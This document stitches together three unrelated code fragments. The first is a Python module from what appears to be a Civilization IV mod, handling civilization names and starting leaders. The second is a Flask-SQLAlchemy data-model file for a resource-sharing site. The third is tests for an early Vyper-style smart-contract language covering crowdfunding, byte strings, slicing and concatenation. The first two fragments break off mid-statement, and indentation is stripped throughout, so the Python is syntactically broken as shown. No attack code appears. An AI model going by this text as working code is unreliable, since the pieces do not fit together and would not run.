dAdjectiveChanges = {
iPhoenicia : "TXT_KEY_CIV_CARTHAGE_ADJECTIVE",
iAztecs : "TXT_KEY_CIV_MEXICO_ADJECTIVE",
iInca : "TXT_KEY_CIV_PERU_ADJECTIVE",
iHolyRome : "TXT_KEY_CIV_AUSTRIA_ADJECTIVE",
iMali : "TXT_KEY_CIV_SONGHAI_ADJECTIVE",
iMughals : "TXT_KEY_CIV_PAKISTAN_ADJECTIVE",
iVikings : "TXT_KEY_CIV_SWEDEN_ADJECTIVE",
iMoors : "TXT_KEY_CIV_MOROCCO_ADJECTIVE",
}
dStartingLeaders = [
# 3000 BC
{
iEgypt : iRamesses,
iIndia : iAsoka,
iBabylonia : iSargon,
iHarappa : iVatavelli,
iChina : iQinShiHuang,
iGreece : iPericles,
iPersia : iCyrus,
iCarthage : iHiram,
iPolynesia : iAhoeitu,
iRome : iJuliusCaesar,
iMaya : iPacal,
iJapan : iKammu,
iTamils : iRajendra,
iEthiopia : iEzana,
iKorea : iWangKon,
iByzantium : iJustinian,
iVikings : iRagnar,
iTurks : iBumin,
iArabia : iHarun,
iTibet : iSongtsen,
iKhmer : iSuryavarman,
iIndonesia : iDharmasetu,
iMoors : iRahman,
iSpain : iIsabella,
iFrance : iCharlemagne,
iEngland : iAlfred,
iHolyRome : iBarbarossa,
iRussia : iIvan,
iNetherlands : iWillemVanOranje,
iMali : iMansaMusa,
iPoland : iCasimir,
iPortugal : iAfonso,
iInca : iHuaynaCapac,
iItaly : iLorenzo,
iMongols : iGenghisKhan,
iAztecs : iMontezuma,
iMughals : iTughluq,
iOttomans : iMehmed,
iThailand : iNaresuan,
iCongo : iMbemba,
iIran : iAbbas,
iGermany : iFrederick,
iAmerica : iWashington,
iArgentina : iSanMartin,
iMexico : iJuarez,
iColombia : iBolivar,
iBrazil : iPedro,
iCanada : iMacDonald,
},
# 600 AD
{
iChina : iTaizong,
},
# 1700 AD
{
iChina : iHongwu,
iIndia : iShahuji,
iIran : iAbbas,
iTamils : iKrishnaDevaRaya,
iKorea : iSejong,
iJapan : iOdaNobunaga,
iTurks : iTamerlane,
iVikings : iGustav,
iSpain : iPhilip,
iFrance : iLouis,
iEngland : iVictoria,
iHolyRome : iFrancis,
iRussia : iPeter,
iNetherlands : iWilliam,
iPoland : iSobieski,
iPortugal : iJoao,
iMughals : iAkbar,
iOttomans : iSuleiman,
iGermany : iFrederick,
}]
### Event handlers
@handler("GameStart")
def setup():
iScenario = scenario()
if iScenario == i600AD:
data.players[slot(iChina)].iAnarchyTurns += 3
elif iScenario == i1700AD:
data.players[slot(iEgypt)].iResurrections += 1
for iCiv in [iVikings, iMoors]:
checkNameChange(slot(iCiv))
checkAdjectiveChange(slot(iCiv))
for iPlayer in players.major():
setDesc(iPlayer, peoplesName(iPlayer))
if player(iPlayer).getNumCities() > 0:
checkName(iPlayer)
if (year(dBirth[iPlayer]) >= year() or player(iPlayer).getNumCities() > 0) and not player(iPlayer).isHuman():
setLeader(iPlayer, startingLeader(iPlayer))
@handler("rebirth")
def onRebirth(iPlayer):
onRespawn(iPlayer)
@handler("resurrection")
def onResurrection(iPlayer):
onRespawn(iPlayer)
def onRespawn(iPlayer):
data.players[iPlayer].iResurrections += 1
if civ(iPlayer) in lRespawnNameChanges:
checkNameChange(iPlayer)
checkAdjectiveChange(iPlayer)
setDesc(iPlayer, defaultTitle(iPlayer))
checkName(iPlayer)
checkLeader(iPlayer)
@handler("vassalState")
def onVassalState(iMaster, iVassal):
iMasterCiv = civ(iMaster)
iVassalCiv = civ(iVassal)
if iVassalCiv in lVassalNameChanges:
if iVassalCiv == iMughals and iMasterCiv not in dCivGroups[iCivGroupEurope]: return
data.players[iVassal].iResurrections += 1
checkNameChange(iVassal)
checkAdjectiveChange(iVassal)
checkName(iVassal)
@handler("playerChangeStateReligion")
def onPlayerChangeStateReligion(iPlayer, iReligion):
if is_minor(iPlayer):
return
if civ(iPlayer) in lChristianityNameChanges and iReligion in lChristianity:
data.players[iPlayer].iResurrections += 1
checkNameChange(iPlayer)
checkAdjectiveChange(iPlayer)
checkName(iPlayer)
@handler("revolution")
def onRevolution(iPlayer):
if is_minor(iPlayer):
return
data.players[iPlayer].iAnarchyTurns += 1
if civ(iPlayer) == iMughals and isRepublic(iPlayer):
checkNameChange(iPlayer)
checkName(iPlayer)
for iLoopPlayer in players.vassals(iPlayer):
checkName(iLoopPlayer)
@handler("cityAcquired")
def onCityAcquired(iPreviousOwner, iNewOwner):
checkName(iPreviousOwner)
checkName(iNewOwner)
@handler("cityRazed")
def onCityRazed(city):
checkName(city.getPreviousOwner())
@handler("cityBuilt")
def onCityBuilt(city):
checkName(city.getOwner())
@handler("periodChange")
def onPeriodChange(iPlayer, iPeriod):
iCiv = civ(iPlayer)
if iCiv == iPhoenicia:
if iPeriod == iPeriodCarthage:
checkNameChange(iPlayer)
checkAdjectiveChange(iPlayer)
if iCiv == iVikings:
if iPeriod == iPeriodDenmark:
setShort(iPlayer, text("TXT_KEY_CIV_DENMARK_SHORT_DESC"))
setAdjective(iPlayer, text("TXT_KEY_CIV_DENMARK_ADJECTIVE"))
elif iPeriod == iPeriodNorway:
setShort(iPlayer, text("TXT_KEY_CIV_NORWAY_SHORT_DESC"))
setAdjective(iPlayer, text("TXT_KEY_CIV_NORWAY_ADJECTIVE"))
elif iPeriod == iPeriodSweden:
setShort(iPlayer, text("TXT_KEY_CIV_SWEDEN_SHORT_DESC"))
setAdjective(iPlayer, text("TXT_KEY_CIV_SWEDEN_ADJECTIVE"))
if iCiv == iMoors:
if iPeriod == iPeriodMorocco:
checkNameChange(iPlayer)
checkAdjectiveChange(iPlayer)
if iCiv == iHolyRome:
if iPeriod == iPeriodAustria:
checkNameChange(iPlayer)
checkAdjectiveChange(iPlayer)
if iPeriod == -1:
revertNameChange(iPlayer)
revertAdjectiveChange(iPlayer)
checkName(iPlayer)
@handler("religionFounded")
def onReligionFounded(_, iPlayer):
if turn() == scenarioStartTurn():
return
checkName(iPlayer)
@handler("BeginGameTurn")
def checkTurn(iGameTurn):
if every(10):
for iPlayer in players.major():
checkName(iPlayer)
checkLeader(iPlayer)
def checkName(iPlayer):
if not player(iPlayer).isAlive(): return
if is_minor(iPlayer): return
if player(iPlayer).getNumCities() == 0: return
setDesc(iPlayer, desc(iPlayer, title(iPlayer)))
def checkLeader(iPlayer):
if not player(iPlayer).isAlive(): return
if is_minor(iPlayer): return
setLeader(iPlayer, leader(iPlayer))
setLeaderName(iPlayer, leaderName(iPlayer))
### Setter methods for player object ###
def setDesc(iPlayer, sName):
try:
player(iPlayer).setCivDescription(sName)
except:
pass
def setShort(iPlayer, sShort):
player(iPlayer).setCivShortDescription(sShort)
def setAdjective(iPlayer, sAdj):
player(iPlayer).setCivAdjective(sAdj)
def setLeader(iPlayer, iLeader):
if not iLeader: return
if player(iPlayer).getLeader() == iLeader: return
player(iPlayer).setLeader(iLeader)
def setLeaderName(iPlayer, sName):
if not sName: return
if infos.leader(player(iPlayer)).getText() != sName:
player(iPlayer).setLeaderName(sName)
### Utility methods ###
def key(iPlayer, sSuffix):
if sSuffix: sSuffix = "_%s" % sSuffix
return "TXT_KEY_CIV_%s%s" % (str(short(iPlayer).replace(" ", "_").upper()), sSuffix)
def desc(iPlayer, sTextKey=str("%s1")):
if team(iPlayer).isAVassal():
return text(sTextKey, name(iPlayer), adjective(iPlayer), name(iPlayer, True), adjective(iPlayer, True))
return text(sTextKey, name(iPlayer), adjective(iPlayer))
def capitalName(iPlayer):
capital = player(iPlayer).getCapitalCity()
if | |
# -*- coding: utf-8 -*-
"""
:author: Kleon
:url: https://github.com/kleon1024
"""
from datetime import datetime
from enum import Enum
from werkzeug.security import generate_password_hash, check_password_hash
from .extensions import db, whooshee
from .common import merge
import json
DIGEST_LENGTH = 64
COLOR_MAX = int("0xffffff", 16)
def to_dict(self):
return {c.name: getattr(self, c.name, None) for c in self.__table__.columns}
@property
def s(self):
return self.to_dict()
db.Model.to_dict = to_dict
db.Model.s = s
class Order(Enum):
time_desc = "time_desc"
time_asc = "time_asc"
class UserRoles:
LOCKED = "Locked"
USER = "User"
MODERATOR = "Moderator"
ADMINISTRATOR = "Administrator"
class Permissions:
FOLLOW = "FOLLOW"
COLLECT = "COLLECT"
COMMENT = "COMMENT"
UPLOAD = "UPLOAD"
MODERATE = "MODERATE"
ADMINISTER = "ADMINISTER"
roles_permissions = db.Table(
"roles_permissions",
db.Column("role_id", db.Integer, db.ForeignKey("role.id")),
db.Column("permission_id", db.Integer, db.ForeignKey("permission.id")),
)
class Role(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
permissions = db.relationship(
"Permission", secondary=roles_permissions, back_populates="roles"
)
users = db.relationship("User", back_populates="role")
@staticmethod
def init_role():
roles_permissions_map = {
"Locked": ["FOLLOW", "COLLECT"],
"User": ["FOLLOW", "COLLECT", "COMMENT", "UPLOAD"],
"Moderator": ["FOLLOW", "COLLECT", "COMMENT", "UPLOAD", "MODERATE"],
"Administrator": [
"FOLLOW",
"COLLECT",
"COMMENT",
"UPLOAD",
"MODERATE",
"ADMINISTER",
],
}
for role_name in roles_permissions_map:
role = Role.query.filter_by(name=role_name).first()
if role is None:
role = Role(name=role_name)
db.session.add(role)
role.permissions = []
for permission_name in roles_permissions_map[role_name]:
permission = Permission.query.filter_by(name=permission_name).first()
if permission is None:
permission = Permission(name=permission_name)
db.session.add(permission)
role.permissions.append(permission)
db.session.commit()
def __repr__(self):
return "<Role %r>" % self.name
class Permission(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
roles = db.relationship(
"Role", secondary=roles_permissions, back_populates="permissions"
)
def __repr__(self):
return "<Permission %r>" % self.name
class Classify(db.Model):
classified_id = db.Column(
db.Integer, db.ForeignKey("media_type.id"), primary_key=True
)
classifier_id = db.Column(
db.Integer, db.ForeignKey("resource_type.id"), primary_key=True
)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
classified = db.relationship(
"MediaType",
foreign_keys=[classified_id],
back_populates="classifiers",
lazy="joined",
)
classifier = db.relationship(
"ResourceType",
foreign_keys=[classifier_id],
back_populates="classifieds",
lazy="joined",
)
name_zh_cn = db.Column(db.String)
name_en_us = db.Column(db.String)
@property
def s(self):
d = self.to_dict()
d["resource_id"] = self.classifier_id
d["resource_name"] = self.classifier.name
d["resource"] = self.classifier.s
d["media_id"] = self.classified_id
d["media_name"] = self.classified.name
d["media"] = self.classified.s
return d
class MediaType(db.Model):
id = db.Column(db.Integer, primary_key=True)
# Media Type: Article/Video/Audio/Image/VR/AR/offline
name = db.Column(db.String)
name_zh_cn = db.Column(db.String)
name_en_us = db.Column(db.String)
resources = db.relationship("Resource", back_populates="media_type")
classifiers = db.relationship(
"Classify", back_populates="classified", lazy="dynamic", cascade="all"
)
def __repr__(self):
return "<MediaType %r>" % self.name
class ResourceType(db.Model):
id = db.Column(db.Integer, primary_key=True)
# Resource Type:
# Internal: QA/Tutorial/Experience/Project/Record/Example/Quiz/Problem
# External: Quora/Blog/Podcast/Course/Book/Music/Movie
name = db.Column(db.String)
name_zh_cn = db.Column(db.String)
name_en_us = db.Column(db.String)
resources = db.relationship("Resource", back_populates="resource_type")
classifieds = db.relationship(
"Classify", back_populates="classifier", lazy="dynamic", cascade="all"
)
def __repr__(self):
return "<ResourceType %r>" % self.name
class Status(db.Model):
id = db.Column(db.Integer, primary_key=True)
status = db.Column(db.String, unique=True)
reports = db.relationship("Report", back_populates="status")
class Report(db.Model):
id = db.Column(db.Integer, primary_key=True)
reported_id = db.Column(db.Integer, db.ForeignKey("resource.id"), primary_key=True)
reporter_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
reported = db.relationship(
"Resource",
foreign_keys=[reported_id],
back_populates="reporters",
lazy="joined",
)
reporter = db.relationship(
"User", foreign_keys=[reporter_id], back_populates="reporteds", lazy="joined"
)
description = db.Column(db.Text)
status_id = db.Column(db.Integer, db.ForeignKey("status.id"))
status = db.relationship("Status", back_populates="reports")
@whooshee.register_model("title")
class ResourceTag(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
creator_id = db.Column(db.Integer, db.ForeignKey("user.id"))
creator = db.relationship("User", back_populates="resource_tags")
resources = db.relationship(
"ResourceStick", back_populates="tag", lazy="dynamic", cascade="all"
)
def remove_all(self):
self.resources.delete(synchronize_session=False)
db.session.delete(self)
db.session.commit()
class ResourceStick(db.Model):
resource_id = db.Column(db.Integer, db.ForeignKey("resource.id"), primary_key=True)
tag_id = db.Column(db.Integer, db.ForeignKey("resource_tag.id"), primary_key=True)
resource = db.relationship(
"Resource", foreign_keys=[resource_id], back_populates="tags", lazy="joined"
)
tag = db.relationship(
"ResourceTag", foreign_keys=[tag_id], back_populates="resources", lazy="joined"
)
class Resource(db.Model):
id = db.Column(db.Integer, primary_key=True)
# title
title = db.Column(db.String)
# resource router
url = db.Column(db.String, unique=True, index=True)
# External resource with third-party url, which is considered as from web.
# If this is declared as False, the resource must be declared as original.
external = db.Column(db.Boolean, default=True)
# Free resource, which must respect the copyright.
free = db.Column(db.Boolean, default=True)
# Reource Type
resource_type = db.relationship("ResourceType", back_populates="resources")
resource_type_id = db.Column(db.Integer, db.ForeignKey("resource_type.id"))
# Media Type
media_type = db.relationship("MediaType", back_populates="resources")
media_type_id = db.Column(db.Integer, db.ForeignKey("media_type.id"))
referencers = db.relationship(
"Reference", back_populates="referenced", lazy="dynamic", cascade="all"
)
reporters = db.relationship(
"Report", back_populates="reported", lazy="dynamic", cascade="all"
)
author_id = db.Column(db.Integer, db.ForeignKey("user.id"))
author = db.relationship("User", back_populates="resources")
create_time = db.Column(db.DateTime, default=datetime.utcnow)
modify_time = db.Column(db.DateTime, default=datetime.utcnow)
deleted = db.Column(db.Boolean, default=False)
collectors = db.relationship(
"Star", back_populates="resource", lazy="dynamic", cascade="all"
)
tags = db.relationship(
"ResourceStick", back_populates="resource", lazy="dynamic", cascade="all"
)
trackers = db.relationship(
"ActionTracker", back_populates="resource", lazy="dynamic", cascade="all"
)
@property
def s(self):
if self.deleted:
d = {"id": self.id, "deleted": self.deleted}
else:
d = self.to_dict()
d["media_type"] = self.media_type.name
d["resource_type"] = self.resource_type.name
return d
def ss(self, current_user):
if self.deleted:
d = {"id": self.id, "deleted": self.deleted}
else:
d = self.to_dict()
d["media_type"] = self.media_type.name
d["resource_type"] = self.resource_type.name
d["tags"] = [t.tag_id for t in self.tags]
return d
def has_tag(self, tag):
return self.tags.filter_by(tag_id=tag.id).first() is not None
def add_tag(self, tag):
if not self.has_tag(tag):
s = ResourceStick(resource_id=self.id, tag_id=tag.id)
db.session.add(s)
db.session.commit()
def remove_tag(self, tag):
s = self.tags.filter_by(tag_id=tag.id).first()
if s is not None:
db.session.delete(s)
db.session.commit()
class Star(db.Model):
resource_id = db.Column(db.Integer, db.ForeignKey("resource.id"), primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
resource = db.relationship(
"Resource",
foreign_keys=[resource_id],
back_populates="collectors",
lazy="joined",
)
user = db.relationship(
"User", foreign_keys=[user_id], back_populates="stars", lazy="joined"
)
@property
def s(self):
d = dict(star_time=self.timestamp)
return d
@whooshee.register_model("description")
class Reference(db.Model):
referenced_id = db.Column(
db.Integer, db.ForeignKey("resource.id"), primary_key=True
)
referencer_id = db.Column(
db.Integer, db.ForeignKey("collection.id"), primary_key=True
)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
order = db.Column(db.Integer)
referenced = db.relationship(
"Resource",
foreign_keys=[referenced_id],
back_populates="referencers",
lazy="joined",
)
referencer = db.relationship(
"Collection",
foreign_keys=[referencer_id],
back_populates="referenceds",
lazy="joined",
)
description = db.Column(db.Text)
class CollectionType(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
collections = db.relationship("Collection", back_populates="type")
create_time = db.Column(db.DateTime, default=datetime.utcnow)
# Resource Collection
@whooshee.register_model("title", "description")
class Collection(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String)
description = db.Column(db.Text, default="")
indicator = db.Column(db.String, default="")
create_time = db.Column(db.DateTime, default=datetime.utcnow)
modify_time = db.Column(db.DateTime, default=datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey("user.id"))
author = db.relationship("User", back_populates="collections")
head_id = db.Column(db.Integer, db.ForeignKey("collection.id"))
head = db.relationship(
"Collection",
foreign_keys=[head_id],
back_populates="subjects",
remote_side=[id],
)
subjects = db.relationship(
"Collection",
foreign_keys=[head_id],
back_populates="head",
lazy="dynamic",
cascade="all",
)
reply_id = db.Column(db.Integer, db.ForeignKey("collection.id"))
reply = db.relationship(
"Collection",
foreign_keys=[reply_id],
back_populates="repliers",
remote_side=[id],
)
repliers = db.relationship(
"Collection",
foreign_keys=[reply_id],
back_populates="reply",
lazy="dynamic",
cascade="all",
)
# Ref to resource
referenceds = db.relationship(
"Reference", back_populates="referencer", lazy="dynamic", cascade="all"
)
# A post belongs to one domain, but a resource may belong to many with refs.
domain_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
domain = db.relationship("Domain", back_populates="collections")
# comments = db.relationship('Comment', back_populates='post', cascade='all')
collectors = db.relationship(
"Collect", back_populates="collected", lazy="dynamic", cascade="all"
)
deleted = db.Column(db.Boolean, default=False)
type_id = db.Column(db.Integer, db.ForeignKey("collection_type.id"))
type = db.relationship("CollectionType", back_populates="collections")
trackers = db.relationship(
"ActionTracker", back_populates="collection", lazy="dynamic", cascade="all"
)
def ref(self, resources):
cur_res = Reference.query.filter_by(referencer_id=self.id).all()
new_res = []
for res in cur_res:
db.session.delete(res)
for res_id in resources:
if res_id in new_res:
continue
new_res.append(res_id)
res = Resource.query.get_or_404(res_id)
ref = Reference(referenced_id=res.id, referencer_id=self.id)
db.session.add(ref)
def resource_indicators(self):
d = {1: "text", 2: "image", 3: "audio", 4: "video"}
indictor = set()
for ref in self.referenceds:
indictor.add(d.get(ref.referenced.media_type_id, ""))
return "".join(indictor)
@property
def s(self):
if self.deleted:
d = {}
d["id"] = self.id
d["deleted"] = self.deleted
else:
d = self.to_dict()
d["domain_title"] = self.domain.title
return d
class Certify(db.Model):
certifier_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
certified_id = db.Column(db.Integer, db.ForeignKey("domain.id"), primary_key=True)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
certifier = db.relationship(
"User", foreign_keys=[certifier_id], back_populates="certifieds", lazy="joined"
)
certified = db.relationship(
"Domain",
foreign_keys=[certified_id],
back_populates="certifiers",
lazy="joined",
)
class Aggregate(db.Model):
id = db.Column(db.Integer, primary_key=True)
ancestor_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
descendant_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
descendant = db.relationship(
"Domain",
foreign_keys=[descendant_id],
back_populates="aggregateds",
lazy="joined",
)
ancestor = db.relationship(
"Domain",
foreign_keys=[ancestor_id],
back_populates="aggregators",
lazy="joined",
)
distance = db.Column(db.Integer)
@property
def s(self):
d = self.to_dict()
d["ancestor"] = self.ancestor.s
d["descendant"] = self.descendant.s
return d
@property
def ss(self):
d = {}
d["ancestor"] = self.ancestor.ss
d["descendant"] = self.descendant.ss
return d
class Depend(db.Model):
id = db.Column(db.Integer, primary_key=True)
ancestor_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
descendant_id = db.Column(db.Integer, db.ForeignKey("domain.id"))
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
descendant = db.relationship(
"Domain",
foreign_keys=[descendant_id],
back_populates="dependants",
lazy="joined",
)
ancestor = db.relationship(
"Domain", foreign_keys=[ancestor_id], back_populates="dependeds", lazy="joined"
)
distance = db.Column(db.Integer)
@property
def s(self):
d = self.to_dict()
d["ancestor"] = self.ancestor.s
d["descendant"] = self.descendant.s
return d
def ss(self, distance=False):
d = {}
d["ancestor"] = self.ancestor.ss
d["descendant"] = self.descendant.ss
if distance:
d["distance"] = self.distance
return d
class Follow(db.Model):
follower_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
followed_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
follower = db.relationship(
"User", foreign_keys=[follower_id], back_populates="followings", lazy="joined"
)
followed = db.relationship(
"User", foreign_keys=[followed_id], back_populates="followers", lazy="joined"
)
# class Vote(db.Model):
# voter_id = db.Column(db.Integer,
# db.ForeignKey('user.id'),
# primary_key=True)
# voted_id = db.Column(db.Integer,
# db.ForeignKey('comment.id'),
# primary_key=True)
# timestamp = db.Column(db.DateTime, default=datetime.utcnow)
# voter = db.relationship('User', back_populates='voteds', lazy='joined')
# voted = db.relationship('Comment', back_populates='voters', lazy='joined')
# class Like(db.Model):
# liker_id = db.Column(db.Integer,
# db.ForeignKey('user.id'),
# primary_key=True)
# liked_id = db.Column(db.Integer,
# db.ForeignKey('sparkle.id'),
# primary_key=True)
# timestamp = db.Column(db.DateTime, default=datetime.utcnow)
# liker = db.relationship('User', back_populates='likeds', lazy='joined')
# liked = db.relationship('Sparkle', back_populates='likers', lazy='joined')
class Collect(db.Model):
collector_id = db.Column(db.Integer, db.ForeignKey("user.id"), primary_key=True)
collected_id | |
num
timelimit: timedelta
def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta):
self.beneficiary = _beneficiary
self.deadline = block.timestamp + _timelimit
self.timelimit = _timelimit
self.goal = _goal
@payable
def participate():
assert block.timestamp < self.deadline
nfi = self.nextFunderIndex
self.funders[nfi] = {sender: msg.sender, value: msg.value}
self.nextFunderIndex = nfi + 1
@constant
def expired() -> bool:
return block.timestamp >= self.deadline
@constant
def timestamp() -> timestamp:
return block.timestamp
@constant
def deadline() -> timestamp:
return self.deadline
@constant
def timelimit() -> timedelta:
return self.timelimit
@constant
def reached() -> bool:
return self.balance >= self.goal
def finalize():
assert block.timestamp >= self.deadline and self.balance >= self.goal
selfdestruct(self.beneficiary)
def refund():
ind = self.refundIndex
for i in range(ind, ind + 30):
if i >= self.nextFunderIndex:
self.refundIndex = self.nextFunderIndex
return
send(self.funders[i].sender, self.funders[i].value)
self.funders[i] = None
self.refundIndex = ind + 30
"""
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=5)
assert c.timelimit() == 600
assert c.deadline() - c.timestamp() == 600
assert not c.expired()
assert not c.reached()
c.participate(value=49)
assert c.reached()
pre_bal = s.head_state.get_balance(t.a1)
s.head_state.timestamp += 1000
assert c.expired()
c.finalize()
post_bal = s.head_state.get_balance(t.a1)
assert post_bal - pre_bal == 54
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=1, sender=t.k3)
c.participate(value=2, sender=t.k4)
c.participate(value=3, sender=t.k5)
c.participate(value=4, sender=t.k6)
s.head_state.timestamp += 1000
assert c.expired()
assert not c.reached()
pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
c.refund()
post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4]
print('Passed second composite crowdfund test')
def test_test_bytes():
test_bytes = """
def foo(x: bytes <= 100) -> bytes <= 100:
return x
"""
c = get_contract(test_bytes)
moo_result = c.foo(b'cow')
assert moo_result == b'cow'
print('Passed basic bytes test')
assert c.foo(b'\x35' * 100) == b'\x35' * 100
print('Passed max-length bytes test')
try:
c.foo(b'\x35' * 101)
assert False
except:
pass
print('Passed input-too-long test')
def test_test_bytes2():
test_bytes2 = """
def foo(x: bytes <= 100) -> bytes <= 100:
y = x
return y
"""
c = get_contract(test_bytes2)
assert c.foo(b'cow') == b'cow'
assert c.foo(b'') == b''
assert c.foo(b'\x35' * 63) == b'\x35' * 63
assert c.foo(b'\x35' * 64) == b'\x35' * 64
assert c.foo(b'\x35' * 65) == b'\x35' * 65
print('Passed string copying test')
def test_test_bytes3():
test_bytes3 = """
x: num
maa: bytes <= 60
y: num
def __init__():
self.x = 27
self.y = 37
def set_maa(inp: bytes <= 60):
self.maa = inp
def set_maa2(inp: bytes <= 60):
ay = inp
self.maa = ay
def get_maa() -> bytes <= 60:
return self.maa
def get_maa2() -> bytes <= 60:
ay = self.maa
return ay
def get_xy() -> num:
return self.x * self.y
"""
c = get_contract(test_bytes3)
c.set_maa(b"pig")
assert c.get_maa() == b"pig"
assert c.get_maa2() == b"pig"
c.set_maa2(b"")
assert c.get_maa() == b""
assert c.get_maa2() == b""
c.set_maa(b"\x44" * 60)
assert c.get_maa() == b"\x44" * 60
assert c.get_maa2() == b"\x44" * 60
c.set_maa2(b"mongoose")
assert c.get_maa() == b"mongoose"
assert c.get_xy() == 999
print('Passed advanced string copying test')
def test_test_bytes4():
test_bytes4 = """
a: bytes <= 60
def foo(inp: bytes <= 60) -> bytes <= 60:
self.a = inp
self.a = None
return self.a
def bar(inp: bytes <= 60) -> bytes <= 60:
b = inp
b = None
return b
"""
c = get_contract(test_bytes4)
assert c.foo() == b"", c.foo()
assert c.bar() == b""
print('Passed string deleting test')
def test_test_bytes5():
test_bytes5 = """
g: {a: bytes <= 50, b: bytes <= 50}
def foo(inp1: bytes <= 40, inp2: bytes <= 45):
self.g = {a: inp1, b: inp2}
def check1() -> bytes <= 50:
return self.g.a
def check2() -> bytes <= 50:
return self.g.b
def bar(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
h = {a: inp1, b: inp2}
return h.a
def bat(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
h = {a: inp1, b: inp2}
return h.b
def quz(inp1: bytes <= 40, inp2: bytes <= 45):
h = {a: inp1, b: inp2}
self.g = h
"""
c = get_contract(test_bytes5)
c.foo(b"cow", b"horse")
assert c.check1() == b"cow"
assert c.check2() == b"horse"
assert c.bar(b"pig", b"moose") == b"pig"
assert c.bat(b"pig", b"moose") == b"moose"
c.quz(b"badminton", b"fluffysheep")
assert c.check1() == b"badminton"
assert c.check2() == b"fluffysheep"
print('Passed string struct test')
def test_test_slice():
test_slice = """
def foo(inp1: bytes <= 10) -> bytes <= 3:
x = 5
s = slice(inp1, start=3, len=3)
y = 7
return s
def bar(inp1: bytes <= 10) -> num:
x = 5
s = slice(inp1, start=3, len=3)
y = 7
return x * y
"""
c = get_contract(test_slice)
x = c.foo(b"badminton")
assert x == b"min", x
assert c.bar(b"badminton") == 35
print('Passed slice test')
def test_test_slice2():
test_slice2 = """
def slice_tower_test(inp1: bytes <= 50) -> bytes <= 50:
inp = inp1
for i in range(1, 11):
inp = slice(inp, start=1, len=30 - i * 2)
return inp
"""
c = get_contract_with_gas_estimation(test_slice2)
x = c.slice_tower_test(b"abcdefghijklmnopqrstuvwxyz1234")
assert x == b"klmnopqrst", x
print('Passed advanced slice test')
def test_test_slice3():
test_slice3 = """
x: num
s: bytes <= 50
y: num
def foo(inp1: bytes <= 50) -> bytes <= 50:
self.x = 5
self.s = slice(inp1, start=3, len=3)
self.y = 7
return self.s
def bar(inp1: bytes <= 50) -> num:
self.x = 5
self.s = slice(inp1, start=3, len=3)
self.y = 7
return self.x * self.y
"""
c = get_contract(test_slice3)
x = c.foo(b"badminton")
assert x == b"min", x
assert c.bar(b"badminton") == 35
print('Passed storage slice test')
def test_test_slice4():
test_slice4 = """
def foo(inp: bytes <= 10, start: num, len: num) -> bytes <= 10:
return slice(inp, start=start, len=len)
"""
c = get_contract(test_slice4)
assert c.foo(b"badminton", 3, 3) == b"min"
assert c.foo(b"badminton", 0, 9) == b"badminton"
assert c.foo(b"badminton", 1, 8) == b"adminton"
assert c.foo(b"badminton", 1, 7) == b"adminto"
assert c.foo(b"badminton", 1, 0) == b""
assert c.foo(b"badminton", 9, 0) == b""
try:
c.foo(b"badminton", 0, 10)
assert False
except:
pass
try:
c.foo(b"badminton", 1, 9)
assert False
except:
pass
try:
c.foo(b"badminton", 9, 1)
assert False
except:
pass
try:
c.foo(b"badminton", 10, 0)
assert False
except:
pass
print('Passed slice edge case test')
def test_test_length():
test_length = """
y: bytes <= 10
def foo(inp: bytes <= 10) -> num:
x = slice(inp, start=1, len=5)
self.y = slice(inp, start=2, len=4)
return len(inp) * 100 + len(x) * 10 + len(self.y)
"""
c = get_contract(test_length)
assert c.foo(b"badminton") == 954, c.foo(b"badminton")
print('Passed length test')
def test_test_concat():
test_concat = """
def foo2(input1: bytes <= 50, input2: bytes <= 50) -> bytes <= 1000:
return concat(input1, input2)
def foo3(input1: bytes <= 50, input2: bytes <= 50, input3: bytes <= 50) -> bytes <= 1000:
return concat(input1, input2, input3)
"""
c = get_contract(test_concat)
assert c.foo2(b"h", b"orse") == b"horse"
assert c.foo2(b"h", b"") == b"h"
assert c.foo2(b"", b"") == b""
assert c.foo2(b"", b"orse") == b"orse"
assert c.foo3(b"Buffalo", b" ", b"buffalo") == b"Buffalo buffalo"
assert c.foo2(b"\x36", b"\x35" * 32) == b"\x36" + b"\x35" * 32
assert c.foo2(b"\x36" * 48, b"\x35" * 32) == b"\x36" * 48 + b"\x35" * 32
assert c.foo3(b"horses" * 4, b"mice" * 7, b"crows" * 10) == b"horses" * 4 + b"mice" * 7 + b"crows" * 10
print('Passed simple concat test')
def test_test_concat2():
test_concat2 = """
def foo(inp: bytes <= 50) -> bytes <= 1000:
x = inp
return concat(x, inp, x, inp, x, inp, x, inp, x, inp)
"""
